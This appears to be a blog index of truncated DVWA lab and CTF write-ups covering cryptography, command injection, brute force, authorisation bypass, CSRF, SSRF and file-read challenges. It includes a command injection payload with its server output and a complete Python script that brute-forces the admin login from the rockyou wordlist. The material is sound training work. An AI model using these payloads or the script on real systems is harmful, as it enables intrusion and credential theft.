James Cao
DVWA Cryptography

DVWA Cryptography Low/Medium/High Security

Description
Vulnerability: Cryptography
Impact: Decode the encoded string to get the correct password.
LOW Security Level
In the source code, this is how the decoding process works:
    $decoded = xor_this (base64_decode ($password), $key);
First Base64-decode the password, then decode it with XOR; the key is wachtwoord. I use CyberChef to decode this encoded string:
Result: Your new password is: Olifant
MEDIUM Security Level
The tokens are encrypted using an Electronic Code Book based algorithm (AES-128-ECB). AES-128-ECB is a 128-bit block cipher. 128 bits is 16 bytes, but to make things human readable, the bytes are represented as hex characters, meaning each byte is two characters. This gives you a block size of 32 characters. ...

October 16, 2025 · 2 min
DVWA Command Injection

DVWA Command Injection Low/Medium/High Security

Description
Vulnerability: Command injection
Impact: Get access to server resources through the ping function.
LOW Security Level
This LOW level ping function doesn't apply any filter or regex to the input we enter. Therefore, we can leverage this vulnerability to execute additional commands on the server. Example:
    1.1.1.1; id
This payload will ping 1.1.1.1 but also run id. The result is:
    PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
    64 bytes from 1.1.1.1: icmp_seq=1 ttl=52 time=63.0 ms
    64 bytes from 1.1.1.1: icmp_seq=2 ttl=52 time=93.5 ms
    64 bytes from 1.1.1.1: icmp_seq=3 ttl=52 time=76.8 ms
    64 bytes from 1.1.1.1: icmp_seq=4 ttl=52 time=50.4 ms
    --- 1.1.1.1 ping statistics ---
    4 packets transmitted, 4 received, 0% packet loss, time 3005ms
    rtt min/avg/max/mdev = 50.401/70.910/93.461/16.016 ms
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
...

October 16, 2025 · 2 min
DVWA Brute Force

DVWA Brute Force Low/Medium/High Security

Description
Vulnerability: Brute-force
Impact: Brute-force and get the admin account credentials.
LOW Security Level
This is the simple code I created to brute-force the admin account using the rockyou.txt password list. Change PHPSESSID to your own one.
    import requests

    baseUrl = "http://localhost/DVWA/vulnerabilities/brute/?Login=Login&username=admin"
    # Session cookie of a logged-in DVWA user, with the security level set to low
    cookies = {
        "PHPSESSID": "91fdcd96e5376633ef607edd0a1b8093",
        "security": "low"
    }

    try:
        with open('/usr/share/wordlists/rockyou.txt') as file:
            for line in file:
                password = line.rstrip()
                url = baseUrl + f"&password={password}"
                try:
                    print(f"Attempting: password={password}")
                    res = requests.get(url, cookies=cookies)
                    # A response without the failure message means the login succeeded
                    if "Username and/or password incorrect." not in res.text:
                        print()
                        print("=> Password found: ", password)
                        exit()
                except requests.exceptions.RequestException as e:
                    print("Request error:", e)
                    continue
    except FileNotFoundError as e:
        print("File not found:", e)
MEDIUM Security Level
The only difference between the LOW and MEDIUM levels is in the "Login failed" if logic: ...

October 16, 2025 · 2 min
DVWA Authorisation Bypass

DVWA Authorisation Bypass Low/Medium/High Security

Description
Vulnerability: Authorisation Bypass
Impact: Leveraging vulnerabilities to get access to the user manager system.
LOW Security Level
The source code doesn't have any checks. You can use the account gordonb / abc123 (this is not an admin account). Since the source code doesn't have any checks, we can just access the URL: http://localhost/DVWA/vulnerabilities/authbypass/
MEDIUM Security Level
The source code is now updated with a check:
    /*
     * Only the admin user is allowed to access this page.
     * Have a look at these two files for possible vulnerabilities:
     *   vulnerabilities/authbypass/get_user_data.php
     *   vulnerabilities/authbypass/change_user_details.php
     */
    if (dvwaCurrentUser() != "admin") {
        print "Unauthorised";
        http_response_code(403);
        exit;
    }
Let's take a look at those 2 files. Visiting get_user_data.php we get: ...

October 16, 2025 · 2 min
DVWA Cover

Exploiting IMPOSSIBLE Security Level CSRF - DVWA

DVWA's CSRF Challenge
This challenge works around a password reset form, enabling the admin to change their password. The first three levels can be exploited with these solutions:
LOW Security Level: we just need a URL with the correct params set up; making a GET request to that URL changes the password.
MEDIUM Security Level: this level adds a check of the Referer header. Since it should match where the request originated from, a simple curl command may exploit this level.
HIGH Security Level: this is where the game really starts; it needs a CSRF token for every request that changes the password. This is not so hard to exploit: a Python script can do it.
For more information: https://github.com/jameskaois/dvwa-vulnerabilities/tree/main/csrf ...

October 11, 2025 · 3 min
WannaGame Freshman CTF 2025 - Wave Second For Git

WannaGame Freshman CTF 2025 - Wave Second For Git Write-up

Room / Challenge: Wave Second For Git (Misc)
Metadata
Author: jameskaois
CTF: WannaGame Freshman CTF 2025
Challenge: Wave Second For Git (Misc)
Difficulty: Medium
Points: 451
Solves: 8
Date: 06-10-2025
Goal
We have to get the flag by using the Git CLI.
My Solution
Here is the source, you can download it here. There is a flag.txt with this content:
    VzF7ZzF0aHViXw==
It is encoded with the Base64 algorithm, so it is easy to decode; the result is the first part of the flag: ...

October 6, 2025 · 1 min
WannaGame Freshman CTF 2025 - Open Read Flag

WannaGame Freshman CTF 2025 - Open Read Flag Write-up

Room / Challenge: Open Read Flag (Web)
Metadata
Author: jameskaois
CTF: WannaGame Freshman CTF 2025
Challenge: Open Read Flag (web)
Target / URL: http://61.28.236.247:10000/
Difficulty: Medium
Points: 484
Solves: 5
Date: 06-10-2025
Goal
We have to get the flag by leveraging the view-file functionality.
My Solution
Here is the source code, you can download and examine it here. The website is simple, with just a read-file functionality. ...

October 6, 2025 · 2 min
WannaGame Freshman CTF 2025 - Admin Toi

WannaGame Freshman CTF 2025 - Admin Toi Write-up

Room / Challenge: Admin Tồi (Web)
Metadata
Author: jameskaois
CTF: WannaGame Freshman CTF 2025
Challenge: Admin Tồi (web)
Target / URL: http://61.28.236.247:9000/
Difficulty: Medium
Points: 419
Solves: 10
Date: 06-10-2025
Goal
We have to get the flag by leveraging the vuln in the authentication feature.
My Solution
Here is the source code, you can download and examine it here. This is the home page of the website. Let's try creating an account and logging in to it to see what we get. ...

October 6, 2025 · 3 min
SunShine CTF 2025 - Intergalactic Webhook Service

SunShine CTF 2025 - Intergalactic Webhook Service Write-up

Room / Challenge: Intergalactic Webhook Service (Web)
Metadata
Author: jameskaois
CTF: SunShine CTF 2025
Challenge: Intergalactic Webhook Service (web)
Target / URL: https://supernova.sunshinectf.games/
Difficulty: Easy
Points: 10
Date: 01-10-2025
Goal
We have to get the flag by leveraging the vuln in the webhook service.
My Solution
Here is the source code, you can download it here. The backend has this vulnerable code:
    def is_ip_allowed(url):
        parsed = urlparse(url)
        host = parsed.hostname or ''
        try:
            # Resolve the hostname once; the later request resolves it again
            ip = socket.gethostbyname(host)
        except Exception:
            return False, f'Could not resolve host'
        ip_obj = ipaddress.ip_address(ip)
        if ip_obj.is_private or ip_obj.is_loopback or ip_obj.is_link_local or ip_obj.is_reserved:
            return False, f'IP "{ip}" not allowed'
        return True, None
This code takes the URL and resolves its hostname to an IP address using DNS. If the IP is private (like 192.168.x.x) or loopback (127.0.0.1), it will be blocked. ...

October 6, 2025 · 1 min
SunShine CTF 2025 - Lunar File Invasion

SunShine CTF 2025 - Lunar File Invasion Write-up

Room / Challenge: Lunar File Invasion (Web)
Metadata
Author: jameskaois
CTF: SunShine CTF 2025
Challenge: Lunar File Invasion (web)
Target / URL: https://asteroid.sunshinectf.games
Difficulty: Medium / Hard
Points: 463
Date: 30-09-2025
Goal
We have to get the flag by authenticating as admin and leveraging a vulnerability.
My Solution
There are no routes on the home page that we can visit normally. Visiting /robots.txt we can see the content: ...

October 6, 2025 · 2 min